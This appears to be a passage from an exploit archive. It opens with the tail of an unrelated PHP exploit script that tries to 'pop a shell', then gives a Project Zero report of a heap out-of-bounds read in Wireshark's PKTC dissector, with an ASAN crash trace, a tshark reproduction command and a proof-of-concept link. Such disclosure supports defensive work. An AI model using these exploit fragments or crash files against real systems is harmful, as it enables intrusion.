overwrite(1, pack("L", $trampoline_ptr - 0x54 + 4), $trampoline_offset);
// exploit
echo "> Attempting to pop a shell\n";
trigger($payload_2);
// if we make it here, something didn't work
echo "> Exploit failed :(\n";
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=754
The following crash due to a heap-based out-of-bounds read can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark ("$ ./tshark -nVxr /path/to/file"):
--- cut ---
==17304==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61b00001335c at pc 0x0000004507c1 bp 0x7fff09b13420 sp 0x7fff09b12bd0
READ of size 1431 at 0x61b00001335c thread T0
#0 0x4507c0 in __interceptor_strlen llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:581
#1 0x7fead8aeeb02 in g_strdup (/lib/x86_64-linux-gnu/libglib-2.0.so.0+0x65b02)
#2 0x7feae0a0b1ef in string_fvalue_set_string wireshark/epan/ftypes/ftype-string.c:51:30
#3 0x7feae09e83f8 in fvalue_set_string wireshark/epan/ftypes/ftypes.c:530:2
#4 0x7feae0867874 in proto_tree_set_string wireshark/epan/proto.c:3572:3
#5 0x7feae088ae05 in proto_tree_add_string wireshark/epan/proto.c:3478:2
#6 0x7feae088b135 in proto_tree_add_string_format_value wireshark/epan/proto.c:3492:7
#7 0x7feae213aa61 in dissect_pktc_rekey wireshark/epan/dissectors/packet-pktc.c:436:5
#8 0x7feae2139f71 in dissect_pktc wireshark/epan/dissectors/packet-pktc.c:624:16
#9 0x7feae08130d1 in call_dissector_through_handle wireshark/epan/packet.c:626:8
#10 0x7feae0805a4a in call_dissector_work wireshark/epan/packet.c:701:9
#11 0x7feae080521d in dissector_try_uint_new wireshark/epan/packet.c:1160:9
#12 0x7feae0805dc4 in dissector_try_uint wireshark/epan/packet.c:1186:9
#13 0x7feae296ebf5 in decode_udp_ports wireshark/epan/dissectors/packet-udp.c:583:7
#14 0x7feae297dc90 in dissect wireshark/epan/dissectors/packet-udp.c:1081:5
#15 0x7feae29719d0 in dissect_udp wireshark/epan/dissectors/packet-udp.c:1087:3
#16 0x7feae08130d1 in call_dissector_through_handle wireshark/epan/packet.c:626:8
#17 0x7feae0805a4a in call_dissector_work wireshark/epan/packet.c:701:9
#18 0x7feae080521d in dissector_try_uint_new wireshark/epan/packet.c:1160:9
#19 0x7feae19601db in ip_try_dissect wireshark/epan/dissectors/packet-ip.c:1978:7
#20 0x7feae19cf7c1 in dissect_ipv6 wireshark/epan/dissectors/packet-ipv6.c:2431:14
#21 0x7feae08130d1 in call_dissector_through_handle wireshark/epan/packet.c:626:8
#22 0x7feae0805a4a in call_dissector_work wireshark/epan/packet.c:701:9
#23 0x7feae080521d in dissector_try_uint_new wireshark/epan/packet.c:1160:9
#24 0x7feae0805dc4 in dissector_try_uint wireshark/epan/packet.c:1186:9
#25 0x7feae1fde9c9 in dissect_null wireshark/epan/dissectors/packet-null.c:458:12
#26 0x7feae08130d1 in call_dissector_through_handle wireshark/epan/packet.c:626:8
#27 0x7feae0805a4a in call_dissector_work wireshark/epan/packet.c:701:9
#28 0x7feae080521d in dissector_try_uint_new wireshark/epan/packet.c:1160:9
#29 0x7feae1542dd5 in dissect_frame wireshark/epan/dissectors/packet-frame.c:493:11
#30 0x7feae08130d1 in call_dissector_through_handle wireshark/epan/packet.c:626:8
#31 0x7feae0805a4a in call_dissector_work wireshark/epan/packet.c:701:9
#32 0x7feae080f58e in call_dissector_only wireshark/epan/packet.c:2674:8
#33 0x7feae0800f4f in call_dissector_with_data wireshark/epan/packet.c:2687:8
#34 0x7feae0800324 in dissect_record wireshark/epan/packet.c:509:3
#35 0x7feae07b36c9 in epan_dissect_run_with_taps wireshark/epan/epan.c:376:2
#36 0x52f11b in process_packet wireshark/tshark.c:3748:5
#37 0x52840c in load_cap_file wireshark/tshark.c:3504:11
#38 0x51e71c in main wireshark/tshark.c:2213:13
0x61b00001335c is located 0 bytes to the right of 1500-byte region [0x61b000012d80,0x61b00001335c)
allocated by thread T0 here:
#0 0x4c2148 in malloc llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:40
#1 0x7fead8ad7610 in g_malloc (/lib/x86_64-linux-gnu/libglib-2.0.so.0+0x4e610)
#2 0x7feaed2fef08 in wtap_open_offline wireshark/wiretap/file_access.c:1082:2
#3 0x52473d in cf_open wireshark/tshark.c:4215:9
#4 0x51e12d in main wireshark/tshark.c:2204:9
SUMMARY: AddressSanitizer: heap-buffer-overflow llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:581 in __interceptor_strlen
Shadow bytes around the buggy address:
0x0c367fffa610: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c367fffa620: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c367fffa630: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c367fffa640: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c367fffa650: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c367fffa660: 00 00 00 00 00 00 00 00 00 00 00[04]fa fa fa fa
0x0c367fffa670: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c367fffa680: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c367fffa690: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c367fffa6a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c367fffa6b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==17304==ABORTING
--- cut ---
The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=12242. Attached is a file which triggers the crash.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39644.zip